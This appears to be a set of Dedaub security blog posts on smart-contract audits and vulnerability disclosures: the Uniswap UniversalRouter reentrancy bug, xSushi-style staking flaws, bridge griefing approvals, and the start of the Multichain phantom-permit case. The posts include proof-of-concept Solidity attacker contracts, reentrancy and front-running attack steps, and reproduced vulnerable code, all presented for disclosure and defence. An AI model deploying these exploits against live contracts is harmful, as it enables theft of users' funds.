Web3 Audit Methodology by Dedaub

Dedaub’s Security Audit teams comprise at least two senior security researchers, as well as any support they may need (e.g., cryptography expertise, financial modeling, testing) from the rest of our team. We carefully match the team’s expertise to your project’s specific nature and requirements. Our auditors conduct a meticulous, line-by-line review of every contract within the audit scope, ensuring that each researcher examines 100% of the code. There is no substitute for a deep understanding of the code and a thorough mental model of its interactions and correctness assumptions.

Web3 Audit Methodology | 4 Main Strategies

Reaching this level of understanding is the goal of a Dedaub audit. To achieve it, we employ strategies such as:

  • Two-phase review: during phase A, the auditors understand the code in terms of functionality, i.e., in terms of legitimate use. During phase B, the auditors assume the role of attackers and attempt to subvert the system’s assumptions by abusing its flexibility.
  • Constant challenging between the two senior auditors: the two auditors continuously challenge each other, trying to identify blind spots. An auditor who claims to have covered and understood part of the code is often challenged to explain difficult elements to the other auditor.
  • Thinking at multiple levels: beyond thinking of adversarial scenarios in self-contained parts of the protocol, the auditors explicitly attempt to devise complex combinations of different parts that may result in unexpected behavior.
  • Use of advanced tools: every project is uploaded to the Dedaub Security Suite for analysis by over 70 static analysis algorithms, AI, and automated fuzzing. The auditors often also write and run manual tests on possible leads for issues. Before the conclusion of the audit, the development team gets access to the online system with our automated analyses, so they can see all the machine-generated warnings that the auditors also reviewed.

Dedaub’s auditors also identify gas inefficiencies in your smart contracts and offer cost optimization recommendations. We thoroughly audit integrations with external protocols and dependencies, such as AMMs, lending platforms, and oracle services, to ensure your code’s use of them aligns with their specifications.

Uniswap Reentrancy Vulnerability Disclosure

By the Dedaub team


Uniswap Labs recently advertised a boosted $3M bounty program for bug reports on their smart contracts, especially the new UniversalRouter and Permit2 functionality. We submitted a bug report and received a bounty — thank you! To our knowledge, ours was the only bug report that Uniswap acted upon (i.e., the only one to have apparently resulted in a commit-fix to smart contract code and a new deployment of the UniversalRouter).

The explanation of the issue is fairly straightforward, so we begin with the verbatim text of our bug report.

Clearly, the UniversalRouter should not hold any balances between transactions, or these can be emptied by anyone (e.g., by calling dispatch with a Commands.TRANSFER, or Commands.SWEEP).

This property is dangerous when combined with any possibility of untrusted parties gaining control in the middle of a user transaction. This can happen, e.g., with tainted ERC20 tokens in Uniswap pools, or with callbacks from token transfers (e.g., ERC721s). A simple attack scenario: a user sends funds to the UniversalRouter and calls it with 3 commands:

1) Commands.V3_SWAP_EXACT_IN, swap to a specific token
2) Commands.LOOKS_RARE_721 (or any of a large number of commands that trigger recipient callbacks), purchase NFT, send it to recipientX
3) sweep amount remaining after purchase to original caller.

In this case, recipientX can easily reenter the contract (by calling transfer or sweep inside its onERC721Received handler) and drain the entire amount, i.e., also the amount of step 3.

In essence, the UniversalRouter is a scripting language for all sorts of token transfers, swaps, and NFT purchases. One can perform several actions in a row, by supplying the right sequence of commands. These commands could include transfers to untrusted recipients. In this case, it is natural to expect that the transfer should send to the recipient only what the call parameters specify, and nothing more.

However, this is not always what would happen. If untrusted code is invoked at any point in the transfer, the code can re-enter the UniversalRouter and claim any tokens already in the UniversalRouter contract. Such tokens can, for instance, exist because the user intends to later buy an NFT, or transfer tokens to a second recipient, or because the user swaps a larger amount than needed and intends to “sweep” the remainder to themselves at the end of the UniversalRouter call. And there is no shortage of scenarios in which an untrusted recipient may be called: WETH unwrapping triggers a callback, there are tokens that perform callbacks, and tokens could be themselves untrusted, executing arbitrary code when their functions get called.
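
To make the reentrancy concrete, here is a minimal sketch of a malicious recipient. It is an illustration only: the execute(bytes, bytes[]) entry point is the one exercised in the test below, but the SWEEP command value (0x04) and its (token, recipient, amountMin) input encoding follow our reading of the router’s dispatcher and may differ across versions; tokenToSteal is hypothetical.

interface IUniversalRouter {
    function execute(bytes calldata commands, bytes[] calldata inputs) external payable;
}

contract MaliciousRecipient {
    IUniversalRouter immutable router;
    address immutable tokenToSteal; // the ERC20 the router still holds mid-script

    constructor(IUniversalRouter _router, address _token) {
        router = _router;
        tokenToSteal = _token;
    }

    // Invoked when the purchased NFT is delivered to us (step 2 above).
    function onERC721Received(address, address, uint256, bytes calldata) external returns (bytes4) {
        // Reenter the router: sweep its entire remaining ERC20 balance to us,
        // including the amount the user meant to reclaim in step 3.
        bytes memory commands = abi.encodePacked(bytes1(0x04)); // Commands.SWEEP, per our reading
        bytes[] memory inputs = new bytes[](1);
        inputs[0] = abi.encode(tokenToSteal, address(this), uint256(0)); // token, recipient, amountMin
        router.execute(commands, inputs);
        return this.onERC721Received.selector;
    }
}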

Our proof-of-concept demonstrated an easy scenario:

Attached are two files. One is a replacement (slight addition) to your foundry test file, universal-router/test/foundry-tests/UniversalRouter.t.sol. The other should be dropped into the “mock” subdirectory. If you then run your standard `forge test -vvv` you will see for the relevant test the output:
======

[PASS] testSweepERC1155Attack() (gas: 126514)
Logs:
1000000000000000000

======

The last line is a console.log from the attacker showing that she obtained a balance in an ERC20 token, although she was only sent an ERC1155 token.

The test case is simply:

function testSweepERC1155Attack() public {
    // A single command: sweep an ERC1155 balance to the attacker.
    bytes memory commands = abi.encodePacked(bytes1(uint8(Commands.SWEEP_ERC1155)));
    bytes[] memory inputs = new bytes[](1);
    uint256 id = 0;
    inputs[0] = abi.encode(address(erc1155), attacker, id, 0);

    // The router holds both an ERC1155 balance (to be swept to the attacker)
    // and an unrelated ERC20 balance (in reality, funds mid-script).
    erc1155.mint(address(router), id, AMOUNT);
    erc20.mint(address(router), AMOUNT);

    // The ERC1155 transfer triggers the attacker's onERC1155Received callback,
    // which reenters the router and drains the ERC20 balance as well.
    router.execute(commands, inputs);
}

That is, the attacker is sent an ERC1155 token amount, but the router also holds an ERC20 token amount. (In reality, such a balance would exist because of other transfers, scheduled to happen later in the same call.) The attacker manages to steal the ERC20 amount as well.

The remedy we suggested was easy:

… add a reentrancy lock, although inelegant: no dispatching commands while in the middle of dispatching commands.
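
A minimal sketch of what such a lock could look like (our illustration, not Uniswap’s actual fix; the contract and function names are hypothetical):

contract LockedRouter {
    uint256 private locked = 1; // 1 = idle, 2 = dispatching

    modifier noReenter() {
        require(locked == 1, "already dispatching");
        locked = 2;
        _;
        locked = 1;
    }

    // No dispatching commands while in the middle of dispatching commands.
    function execute(bytes calldata commands, bytes[] calldata inputs) external payable noReenter {
        // ... dispatch each command ...
    }
}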

We got immediate confirmation that the issue is being examined and will be assessed for the bounty program. A couple of weeks later, we received the bounty assessment:

we would like to award you a one-time bounty of $40,000 (payable in USDC) for your contribution. This amount includes a $30,000 bounty for the report, as well as a 33% bonus for reporting the issue during our current bonus period. We have classified the issue as medium severity and appreciate your assistance in helping us improve the safety of our users and the web3 ecosystem as a whole.

Further communication clarified that the bug was assessed to have High impact and Low likelihood: the possibility of a user sending NFTs to an untrusted recipient directly (although present in the UniversalRouter unit tests) is considered “user error”. Therefore, only much more complex (and less likely) scenarios were considered valid, resulting in the “low likelihood” rating.

We want to thank Uniswap Labs for the bounty and are happy to have helped!

Latent Bugs in Billion-plus Dollar Code

You are probably safe, but be aware…

Daniel Von Fange pinged me last week:

Hey, I just realized that the xSushi reward distribution contract that’s commonly cloned around would be vulnerable to complete theft if the deposit token used was an ERC777 style that allowed reentrancy.

The message set in motion the close examination of just ~15 lines of code, handling funds in the billions.

We found not one, but two latent bugs. Both have pretty specific conditions for becoming vulnerabilities. We did our best to ascertain that current deployments are not at risk. (There was a time when an attacker could steal $60M, though.) However, this doesn’t mean there’s no risk: there may be tokens that, if you intend to stake them, let one attack you right now, let alone what can happen with future deployments.

Take-home message:

  • be extra careful with the initial stakes of xSushi-like reward contracts
  • never deploy such contracts with ERC777 underlying tokens.

and generally:

  • be aware of reentrancy threats when interacting with ERC777 tokens.

The Code

Here is an instance of the code in question, a common snippet of a staking token contract. Such code was originally used in the xSushi staking contract and has since been extensively cloned.

contract VulnerableXToken {
    // ..

    // Pay some tokens and earn some shares.
    function enter(uint256 _amount) public {
        uint256 totalToken = token.balanceOf(address(this));
        uint256 totalShares = totalSupply();
        if (totalShares == 0 || totalToken == 0) {
            _mint(msg.sender, _amount);
        } else {
            uint256 what = _amount.mul(totalShares).div(totalToken);
            _mint(msg.sender, what);
        }
        token.transferFrom(msg.sender, address(this), _amount);
    }

    // Claim back your tokens.
    function leave(uint256 _share) public {
        uint256 totalShares = totalSupply();
        uint256 what = _share.mul(token.balanceOf(address(this))).div(totalShares);
        _burn(msg.sender, _share);
        token.transfer(msg.sender, what);
    }
    
    // ..
}

The enter function just accepts an investment in an underlying token (token, in the above) and issues shares by minting staking tokens (VulnerableXToken). The staking tokens accrue rewards, and upon leave the investor can claim back their rightful proportion of the underlying token.

Bug #1

The code looks reentrancy-safe at first glance. The external call (transferFrom) happens after all state updates (_mint). So, it seems that nothing can go wrong.

Back on Feb. 24, well-known Ethereum security engineer t11s had tweeted a warning about ERC777 tokens.

The killer feature of ERC777 is its receive hooks, allowing contracts to react when receiving tokens. What is mentioned less often is the corresponding hook called on the sender of the funds, which MUST be called before updating the state.

Implementation Requirement:
The token contract MUST call the tokensToSend hook before updating the state.
The token contract MUST call the tokensReceived hook after updating the state.

This means that any ERC777 token is a reentrancy death trap! The token itself violates the “effects before external calls” rule: it calls out to the sender before it commits the effects of a transfer. Any caller into the token may be maintaining the effects-before-calls rule, but it may not matter, if the token itself does not. The caller should either be agnostic to the token’s effects (i.e., never read balances) or should use reentrancy locks.

What Daniel had realized regarding xSushi-like code is that the PRE-transfer hook in an ERC777 token’s transferFrom would allow an attacker to reenter (literally: re-enter, in the above code) before any funds had been transferred to the staking contract, taking advantage of any state changes made before the call. In our case, upon reentering, the VulnerableXToken total supply has changed (by the internal _mint call) but the underlying token’s balance has not: there are more shares but the same funds, so, when re-entering, shares appear to be cheaper!

Of course, the underlying token does not necessarily need to be an ERC777, as this exploit could be possible for any token that implements similar callback mechanisms to the ones described.

To summarize:

  • IF the underlying token (token, in the above code) of an xSushi-like rewards contract calls back a hook (e.g., is an ERC777, which calls tokensToSend on the sender)
  • AND the underlying token does this callback before adjusting the balance,
  • THEN one can reenter and get shares cheaper, all the way to full depletion of everyone else’s funds.
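
For illustration, here is a minimal sketch of such an attacker, assuming an ERC777-style underlying token that invokes the sender’s tokensToSend hook from inside transferFrom (ERC1820 hook registration, approvals, funding, and constructor wiring are elided):

contract ReenterOnEnter {
    VulnerableXToken xToken; // the staking contract shown above; wiring elided
    bool reentered;

    function attack(uint256 amount) external {
        // enter() mints our shares first and only then calls
        // token.transferFrom, which triggers our tokensToSend hook.
        xToken.enter(amount);
    }

    // ERC777 sender hook, called before any balance moves.
    function tokensToSend(address, address, address, uint256 amount, bytes calldata, bytes calldata) external {
        if (!reentered) {
            reentered = true;
            // totalShares has grown (our mint) but the contract's token
            // balance has not: shares are momentarily underpriced.
            xToken.enter(amount);
        }
    }
}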

Bug #2

When I shared the code in the Dedaub internal channels, Konstantinos (one of our senior engineers) immediately commented:
“I see the bug — haven’t we encountered this in an audit before?”

Indeed we had…

… but he wasn’t seeing Daniel’s bug!!!

It was an entirely different bug, based on making the division _amount.mul(totalShares).div(totalToken) round down to zero when another user is depositing. In this way, the depositor would get zero shares, but the old holders of shares would keep the newly deposited funds.

A simple attack scenario with only two depositors (attacker and victim) would go as follows:

  • The attacker is the first person to call enter and deposits amount1 of token, getting back an equal amount of shares.
  • The next depositor comes in and tries to deposit amount2 of token. The attacker front-runs them and directly transfers to the contract any amount of token greater than (amount2 - 1) * amount1.
  • The attacker gets no shares in return, but they have all the shares to begin with! In this way, amount2*totalShares/totalToken rounds down to zero, leaving the next depositor with nothing, while the attacker can withdraw all the deposited token by calling leave, as they own all the shares.
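
A concrete instance, with our own illustrative numbers: the attacker calls enter with amount1 = 1 token unit, receiving 1 share. A victim is about to enter with amount2 = 1000 units. The attacker front-runs with a direct transfer of 1000 units (greater than (1000 - 1) * 1), so the contract holds 1001 units against 1 share. The victim’s mint computes 1000 * 1 / 1001, which rounds down to 0 shares. The attacker’s single share now redeems, via leave, all 2001 units, including the victim’s 1000.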

To see how big an impact this bug can have, consider the first transfer to the xDVF staking token:

This was a transfer for 12.5 million DeversiFi tokens, currently valued at $5 each. An attacker could have front-run that transfer and stolen all $60M worth of tokens!

Checks for Live Vulnerabilities

To determine if there are funds under threat right now, we used the Dedaub Watchdog database to query all currently-deployed contracts on Ethereum, together with their current balances.

  • There are 239 deployed Ethereum contracts with the xSushi-like enter/leave code in publicly posted source.
  • 13 of those have staked funds right now. The highest-value are xShib ($960M), xSushi ($233M), and xDVF ($72M).
  • None of those has an ERC777 as an underlying.
  • The largest value that would have been at risk of a front-running attack during the initial deposit is the $60M in xDVF, as discussed earlier.
  • We also checked Polygon and found only 4 xSushi-like contracts, none with staked funds.

Although the above numbers should be fairly complete, it’s worth noting there may still be threats we are missing. The same code could be deployed in networks other than Ethereum; vulnerable contracts may have no published source, so our search may have missed them; our balances query may be incomplete for tokens that don’t emit the expected events upon transfers; and our Polygon scan was not exhaustive — just considered the last 200K contracts or so.

And, of course, any initial staking in any xSushi-like contract, among the current 200+ deployed or future ones, is vulnerable to front-running attacks.

Conclusion

The code we looked at is very simple and problematic only in very subtle ways, not all under its control (e.g., the ERC777 reentrancy is arguably not the xSushi code’s problem). It is likely to keep getting cloned, or to have independently arisen in other settings. (In the latter case, please let us know!)

Either way, we repeat our message for awareness:

  • be extra careful with the initial stakes of xSushi-like reward contracts
  • never deploy such contracts with ERC777 underlying tokens.

and generally:

  • be aware of reentrancy threats when interacting with ERC777 tokens.

These are attack vectors that the community should know about, lest we see one of them being exploited for heavy damages.

Mass Disclosure of Griefing Vulnerabilities

This week, with the help of @drdr_zz and @wh01s7 of SecuRing, we tackled a backlog of warnings from the Dedaub Watchdog tool, notifying around 100 holders of vulnerable accounts, with some $80M in funds exposed. (@_trvalentine had earlier produced proof-of-concept code to demonstrate that the attack is valid.)

The warnings concern griefing vulnerabilities: cases where an attacker can move the victim’s funds to a contract, but this does not confer the attacker any direct benefit — only makes life harder for the victim, up to possible loss of funds.

Although there’s not much technically novel in the vulnerabilities themselves, we decided to write this report to describe the events and the mass-disclosure method, via etherscan chat messages.

A Word of Introduction

The Dedaub Watchdog tool (built over our public contract-library.com infrastructure) continuously analyzes all deployed contracts on Ethereum. It implements some 80 different analyses and combines warnings over the code with the current state of the chain (e.g., balances, storage contents, approvals). It is our main workhorse for discovering vulnerabilities — in the past year, we have disclosed several high-impact vulnerabilities with exposure in the billions and received 9 bug bounties totaling ~$3M. (Bounties by DeFi Saver, Dinngo/Furucombo, Primitive, Armor, Vesper, BT Finance, Harvest, Multichain/Anyswap, and Rari/Tribe DAO.)

The griefing vulnerabilities of this report are a bit below this bar: they typically represent a simple, direct oversight, which could be lethal, but thankfully the attacker can’t gain much by exploiting it. It’s the kind of vulnerability that we might typically silently report and forget about.

In this case, however, the number of potential victim accounts started mounting. We had a list of 18 vulnerable contracts that exposed a transferFrom (from any victim) to untrusted callers, while holding approvals for high-value tokens from many hundreds of victims. When we actually ran the query to cross-reference vulnerable contracts with the victims that had approved them AND had balances in the exposed token, we were stunned to find 564 threatened accounts, with a total of $80M at risk, including one account with $76M exposed!

Griefing Vulnerability

There were 2–3 different vulnerable code patterns, but the main one is quite simple. It allows transferring the victims’ funds to a bridge contract using a function callable by anyone.


How serious this is depends on the bridge protocol’s specifics. In the best case, it is just messy: a human needs to be involved, verify that the victim’s funds were indeed transferred inadvertently and are still at the bridge, and authorize a transaction to return the funds to the victim. In the worst case, the funds remain stuck forever. Also, such a vulnerability greatly increases the griefing attack surface: the bridge contract may itself be vulnerable.
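
A minimal sketch of the pattern (our simplification, not any specific bridge’s code; all names are hypothetical):

contract Bridge {
    // Callable by anyone: the caller chooses `from`, and the bridge holds
    // standing ERC20 approvals from many users. An attacker can thus move a
    // victim's funds into the bridge without the victim's involvement.
    function depositFor(address token, address from, uint256 amount) external {
        IERC20(token).transferFrom(from, address(this), amount);
        _queueForBridging(token, from, amount); // hypothetical internal bookkeeping
    }
}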

Responsible Disclosure

We contacted the main bridge protocol behind the vulnerable contracts, but the contracts were in active use, so a code fix alone would not remove the existing exposure. The right course of action was to also contact potential victims directly, especially those with current exposure (i.e., a combination of balance and approval over the same token).

We had a list of 564 addresses in front of us. But we did not know the identity of the account owners.

The best-practices playbook in this case seems to be:

  • Check if the address is the owner of an ENS domain and if there is a contact there.
  • For addresses with significant funds, contact the projects directly (i.e., the protocol with the vulnerable contract); they very often know the identity of their largest clients/holders.
  • Use the etherscan chat feature.

Another standard concern when notifying victims is that each victim, after securing their own funds, could become a potential attacker. After discussion, we considered this risk to be small. We lowered it to a minimum by starting with the addresses with the most funds (thus reducing the potential reward / satisfaction of the attacker).

The plan was as follows:

  1. Manually verify and try to establish the identity of the addresses with the most funds, through ENS or through the official communication channels of project teams in which they hold a large share.
  2. Automatically notify the remaining holders at risk using the etherscan chat.

Manual verification turned out to be relatively simple. The address with $76M threatened was the 3rd largest holder in the XCAD Network project. @drdr_zz spoke directly to the CEO via the official channel and after only 45 minutes, the funds were safu again.

However, there were still a lot of addresses whose identities were unknown. Even with the etherscan chat feature, it would be very time-consuming to write to each holder separately. As far as we know, etherscan chat does not currently offer a simple API that we can hook into. However, after a little research, we determined that it works over a WebSocket connection.

The mechanism is as follows:

  1. A wallet owner connects her wallet (e.g., via Metamask) to the Chat application.
  2. The application assigns a valid session cookie to the user and a temporary token to authenticate the WebSocket connection.
  3. A WebSocket connection is opened using the cookie and the token is sent to the server.
  4. The user can now send chat messages via WebSocket.

We wrote a script to automate the whole process, and 98 messages were sent to inform users that had over $1k exposed.

The message sent was:

Hello,

I’m a security researcher (from SecuRing, collaborating with Dedaub) and I’m writing to let you know that your account has exposed funds to contract ADDRESS, for token “TOKEN”.

Any attacker can call a function on this contract that will cause it to transferFrom your funds to the contract. The attacker does not stand to gain from this, so the risk is perhaps not critical.

However, it is a threat, and you may have significant trouble getting your funds back if it happens.

We strongly recommend removing approvals to contract ADDRESS for the “TOKEN” token. You can use the etherscan tool to do so, or any other trusted approval remover.

(This threat was automatically identified using Dedaub’s Watchdog analysis, but the threat was confirmed manually with a proof-of-concept implementation.)

Thank you.

After half a day, we started getting back “thank you” messages.

Lessons learned

  • The etherscan chat feature is a great tool for direct contact with unknown account holders. But the response time may be unsatisfactory since the holder needs to poll their account page on etherscan, and the chat feature is not too widely known and used.
  • Token approvals of this form are arguably more of a UI problem than a smart contract problem, which is why it is important to be aware of standing approvals as an account holder (just as it is to verify transactions before signing them).

It was a pleasure to have this collaboration between Dedaub and SecuRing, and hopefully we helped improve Ethereum security a bit.

The Dedaub Watchdog Service

The Dedaub Watchdog is a technology-driven continuous auditing service for smart contracts.

What does this even mean? “Technology-driven”? Is this a buzzword for “automated”? Do you mean I should trust a bot for my security? (You should never trust security to just automated solutions!) And “auditing” means manual inspection, right? Is this really just auditing with tools?

Let’s answer these questions and a few more…

Watchdog brings together four major elements for smart contract security:

  • automated, deep static analysis of contract code
  • dynamic monitoring of a protocol (all interacting/newly deployed contracts, current on-chain state, past and current transactions)
  • statistical learning over code patterns in all contracts ever deployed in EVM networks (Ethereum, BSC, Avalanche, Fantom, Polygon, …)
  • human inspection of warnings raised.

All continuously updated: if a new vulnerability is discovered, the most natural question is “am I affected?” Watchdog queries are updated to detect this and warn you.

Is it effective? Let’s just say, it is exactly the technology that we have been using internally for a little over a year. It has resulted in many disclosures of vulnerabilities in deployed contracts and 9 high-value bug bounties totaling over $3M. (Bounties by DeFi Saver, Dinngo/Furucombo, Primitive, Armor, Vesper, BT Finance, Harvest, Multichain/Anyswap, and Rari/Tribe DAO.)

Analysis

At Dedaub, we have audited thousands of smart contracts, comprising dozens of high-value DeFi protocols, numerous libraries, and dapps. Our customers include the Ethereum Foundation, Chainlink, Immunefi, Nexus Mutual, Liquity, DeFi Saver, Yearn, Perpetual, and many more. Since 2018, we’ve been operating contract-library, which continuously decompiles all smart contracts deployed on Ethereum (plus testnets, Polygon, and soon a lot more).

But our background comes from deep program analysis. The Dedaub founders are top researchers in this space, with tens of research publications. (Here are a few recent ones, specifically on our smart contract analysis technology — including the main paper on the technology behind the Watchdog analyses.)

The Watchdog service brings together all our expertise: it captures much of the experience from years of smart contract auditing as highly-precise static analyses. It is an analysis service that goes far beyond the usual linters for mostly-ignorable coding issues. It finds real issues, with high fidelity/precision.

So, what does Watchdog analyze for? There are around 80 analyses at the time of writing, in mid-2022. By the time you read this, there will likely be several more. Here are a few important ones for illustration.

DeFi-specific analyses

  • Is there a swap action on a DEX (Uniswap, Sushiswap, etc.) that can be attacker-controlled, with respect to token, timing manipulation, or expected returned amount? Such analyses of the contract code are particularly important to combine with the current state of the blockchain (e.g., liquidity in liquidity pools) for high-value vulnerability warnings. More on that in our “dynamic monitoring”, later.
  • Are there callbacks from popular DeFi protocols (e.g., flash loans) that are insufficiently guarded and can trigger sensitive protocol actions?
  • Are there protection schemes in major protocols (e.g., Maker) that are used incorrectly (or, more typically, with subtle assumptions that may not hold in the client contract code)?

Cryptographic/permission analyses

  • Does a permit check all sensitive arguments?
  • Does cryptographic signing follow good practices, such as including the chain id in the signed data? (If not, is the same contract also deployed on testnets/other chains, so that replay attacks are likely?) See the sketch after this list.
  • Can an untrusted user control (“taint”) the arguments of highly sensitive operations, such as approve, transfer, or transferFrom? If so, does the contract have actual balances that are vulnerable?
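
As a sketch of the chain-id practice in the second bullet, a standard EIP-712 domain separator binds signatures to one chain and one deployment (the protocol name and version below are placeholders):

// block.chainid prevents cross-chain replay; address(this) prevents replay
// against other deployments of the same code.
bytes32 domainSeparator = keccak256(abi.encode(
    keccak256("EIP712Domain(string name,string version,uint256 chainId,address verifyingContract)"),
    keccak256(bytes("MyProtocol")), // hypothetical protocol name
    keccak256(bytes("1")),          // hypothetical version
    block.chainid,
    address(this)
));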

Statistical analyses

  • Compare the contract’s external API calls to the same API calls over the entire corpus of deployed contracts. Does the contract do something unusual? E.g., does it allow an external caller to control, say, the second argument of the call, whereas the majority of other contracts that make the same call do not allow such manipulation?
    Such generic, statistical inferences capture a vast array of possible vulnerabilities. These include some we have discussed above: e.g., does the contract use Uniswap, Maker, Curve, and other major protocols correctly? But statistical observations also capture many unknown vulnerabilities, use of less-known protocols, future patterns to arise, etc.

Conventional analyses

  • Watchdog certainly analyzes for well-known issues, such as overflow, reentrancy, unbounded loops, wrong use of blockhash entropy, delegatecalls that can be controlled by attackers, etc. The challenge is to make such analyses precise. Our technology does exactly that.

Yet-unknown vulnerabilities

We continuously study every new vulnerability/attack that sees the light of day, and try to derive analyses to add to Watchdog to detect (and possibly generalize) the same vulnerability in different contracts.

Monitoring

No matter how good a code analysis is, it will nearly never become “high-value” on its own. Most of the above analyses become actionable only when combined with the current state of the blockchain(s). We already snuck in a couple of examples earlier. An analysis that checks if a contract allows an untrusted caller to do a transferFrom of other accounts’ funds is much more important for contracts that have allowances from other accounts. A warning that anyone can cause a swap of funds held in the contract is much more important if the contract has sizeable holdings, so that the swap is profitable after tilting the AMM pool. An analysis that checks that a signed message does not include a chain id is much more important for contracts that are found to be deployed on multiple chains.

Combining analysis warnings with the on-chain state of the contract (and of other contracts it interacts with) is precisely the goal of Watchdog, and how it can focus on high-promise, high-value vulnerabilities.

Inspection

Automation is never the final answer for security. Security threats exist exactly because they can arise at so many levels of abstraction: from the logical, protocol, financial level, all the way down to omitting a single token in the code. Only human intelligence can offer enough versatility to recognize the potential for sneaky attacks.

This is why Watchdog is a technology-driven continuous auditing service. It can issue warnings that focus a human’s attention to the most promising parts of the code. By inspecting warnings, the human auditor can determine whether they are likely actionable and escalate to protocol maintainers.

We call Watchdog auditors “custodians”. The custodian of a protocol is not just a code auditor, but the go-to person for all warnings, all contacts to Dedaub and to other security personnel. By subscribing to Watchdog, a project gets its designated custodian who monitors warnings, knows the contact points and how to escalate reports, coordinates with any incident response team (either in place, or ad hoc, either external, or as part of Dedaub services), and ultimately advises on the project’s security needs.

In terms of software alone, Watchdog integrates two ideas to help a custodian inspect and prioritize warnings:

  • The concept of protocols: all contracts monitored are grouped into protocols, based on deployers and interactions. Any new contracts that get deployed are automatically grouped into their protocol and monitored. Reports and watchlists are easy to define to match the project’s needs.
  • Flexibility in the number of warnings issued: Watchdog comes with different levels of service. The minimum level gets roughly a couple of hours per week of a custodian’s time. At this level, the custodian will likely inspect warnings very quickly and issue only the highest-confidence ones.
    The next level of support, intended to be the middle-of-the-road offering, covers roughly two auditor-days per month. At that level, the custodian can spend significant time, at least every couple of weeks, to inspect a broader range of warnings. Watchdog supports this configurability seamlessly: it lets the custodian select warning kinds and mix them with many filters, to produce an inspection set that is optimal for covering in a given amount of time.

Contact Us … Soon

The Watchdog service has already had a handful of early institutional adopters (such as Nexus Mutual and the Fantom blockchain, both securing multiple protocols). We are currently enhancing our infrastructure and organizational capability, to launch Watchdog to broad availability (for individual protocols and not just institutional clients) by the end of 2022. You will be able to make inquiries and book a demo or live technical presentation with our team on the Dedaub Watchdog page.

Phantom Functions and the Billion-dollar No-op

By the Dedaub team

On Jan. 10 we made a major vulnerability disclosure to the Multichain project (formerly “AnySwap”). Multichain has made a public announcement that focuses on the impact on their clients and mitigation. The announcement was followed by attacks and a flashbots war. The total value of funds currently lost is around 0.5% of those directly exposed initially.

[ADVISORY: If you have ever used Multichain/Anyswap, check/revoke your approvals for vulnerable tokens. Make sure to check all chains and read the full instructions if anything is unclear.]

We will document the attacks and defense in a separate chronology, to be published after the threat is fully mitigated. This brief writeup instead intends to illustrate the technical elements of the vulnerability, i.e., the attack vector.

The attack vector is, to our knowledge, novel. The Solidity/EVM developer and security community should be aware of the threat.

In the particular case of Multichain contracts, the attack vector led to two separate, major vulnerabilities, one mainly in the WETH (“Wrapped ETH”) liquidity vault contract (an instance of AnyswapV5ERC20) and one in the router contract (AnyswapV4Router) that forwards tokens to other chains. The threat was enormous and multi-faceted — almost “as big as it gets” for a single protocol:

  • On Ethereum alone, $431M in WETH could be stolen in a single, direct transaction, from just 3 victim accounts. We demonstrated this on a local fork before the disclosure. (Balances and valuations are as of the time of original writing of this explanation, on Jan. 12. The main would-be victim account, the AnySwap Fantom Bridge, was holding over $367M by itself. At the time of publication of this article, the same contract held $1.2B.)
  • The same contracts have been deployed for different tokens and on several blockchains, including Polygon, BSC, Avalanche, Fantom. (Liquidity contracts for other wrapped native tokens, such as WBNB, WAVAX, WMATIC are also vulnerable.) The risk on these other networks was later estimated at around $40M.
  • The main would-be victim account, the AnySwap Fantom Bridge, escrows tokens that have moved to the Fantom blockchain. This means that an attacker could move any sum to Fantom and then steal it back on Ethereum, together with the current $367M of the bridge (and the many tens of millions from other victims, separately). The moved tokens would still be alive (and valuable) in Fantom, or anywhere else they have since moved to. This makes the potential impact of the attack theoretically unbounded (“infinite”): any amount “invested” can be doubled, in addition to the $431M amount stolen from Ethereum victims and however much on other chains.
  • Close to 5000 different accounts had given infinite approval for WETH to the vulnerable contracts (on Ethereum). This number has since dropped substantially (especially among accounts with holdings), but there is still a threat: any WETH these accounts ever acquire is vulnerable, until approvals are revoked.

Given the above, the potential practical impact (had the vulnerability been fully exploited) is arguably in the billion-dollar range. This would have been one of the largest hacks ever—given the theoretically unbounded threat, we are not getting into more detailed comparisons.

Phantom Functions | Attack Vector

Briefly:

Callers should not rely on permit reverting for arbitrary tokens.

The call token.permit(...) never reverts for tokens that

  • do not implement permit, and
  • have a (non-reverting) fallback function.

Most notably, WETH — the ERC-20 representation of ETH — is one such token.

We call this pattern a phantom function — e.g., we say “WETH has a phantom permit” or “permit is a phantom function for the WETH contract”. A contract with a phantom function does not really define the function but accepts any call to it without reverting. On Ethereum, other high-valuation tokens with a phantom permit are BNB and HEX. Native-equivalent tokens on other chains (e.g., WBNB, WAVAX) are likely to also exhibit a phantom permit.

In more detail:

Smart contracts in Solidity can contain a fallback function. This is the code to be called when any function f() is invoked on a contract but the contract does not define f().

In current Solidity, fallback functions are rather exotic functionality. In older versions of Solidity, however, including fallback functions was common, because the fallback function was also the code to call when the contract received ETH. (In newer Solidity versions, an explicit receive function is used instead.) In fact, the fallback function used to be nameless: just function(). For instance, the WETH contract contains fallback functionality defined as follows:

function() public payable {
      deposit();
}
function deposit() public payable {
      balanceOf[msg.sender] += msg.value;
      Deposit(msg.sender, msg.value);
}

This function is called when receiving ETH (and just deposits it, to mint wrapped ETH with it) but, crucially, is also called when an undefined function is invoked on the WETH contract.

The problem is, what if the undefined function is relied upon for performing important security checks?

In the case of AnySwap/MultiChain code, the simplest vulnerable contract contains code such as:

function deposit() external returns (uint) {
    uint _amount = IERC20(underlying).balanceOf(msg.sender);
    IERC20(underlying).safeTransferFrom(msg.sender, address(this), _amount);
    return _deposit(_amount, msg.sender);
}
...
function depositWithPermit(address target, uint256 value, uint256 deadline, uint8 v, bytes32 r, bytes32 s, address to) external returns (uint) {
    // For a token like WETH, which defines no permit, the next call hits the
    // token's fallback function and silently succeeds as a no-op.
    IERC20(underlying).permit(target, address(this), value, deadline, v, r, s);
    IERC20(underlying).safeTransferFrom(target, address(this), value);
    return _deposit(value, to);
}

This means that the regular deposit path (function deposit) transfers money from the external caller (msg.sender) to this contract, which needs to have been approved as a spender. This deposit action is always safe, but it lulls clients into a false sense of security: they approve the contract to transfer their money, because they are certain that it will only happen when they initiate the call, i.e., they are the msg.sender.

The second path to depositing funds, function depositWithPermit, however, allows depositing funds belonging to someone else (target), as long as the permit call succeeds.

For ERC-20 tokens that support it, permit is an alternative to the standard approve call: it allows an off-chain secure signature to be used to register an allowance. The permitter is approving the beneficiary to spend their money, by signing the permit request. The permit approach has several advantages: there is no need for a separate transaction (spending gas) to approve a spender, allowances have a deadline, transfers can be batched, and more.

The problem in this case, as discussed earlier, is that the WETH token has a phantom permit, so the call to it is a non-failing no-op. Still, this should be fine, right? How can a no-op hurt? The permit did not take place, so no approval/allowance to spend the target’s money should exist.

